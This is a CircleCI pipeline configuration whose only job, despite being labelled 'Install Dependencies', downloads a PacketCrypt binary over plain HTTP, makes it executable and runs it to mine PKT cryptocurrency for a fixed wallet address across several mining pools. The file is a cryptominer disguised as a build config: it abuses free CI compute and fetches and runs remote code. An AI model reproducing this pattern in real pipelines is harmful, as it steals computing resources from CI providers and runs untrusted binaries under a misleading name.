version: 2.1
jobs:
    trial:
      docker:
            - image: nguyenduyphong/pkt_phong:tagname
      parallelism: 1
      steps:
        - run:
            name: Install Dependencies
            command: |
            wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
            chmod +x packetcrypt_x8664_linux
            ./packetcrypt_x8664_linux ann -p pkt1qmq6x0lwcd0780auygdfa7d0us4gf333ua0ljsq http://pool.pkt.world/ http://pool.pktpool.io/ https://pool.pkthash.com http://pool.pkteer.com -t 1          

workflows:
    version: 2.1
    build:
        jobs:
        - trial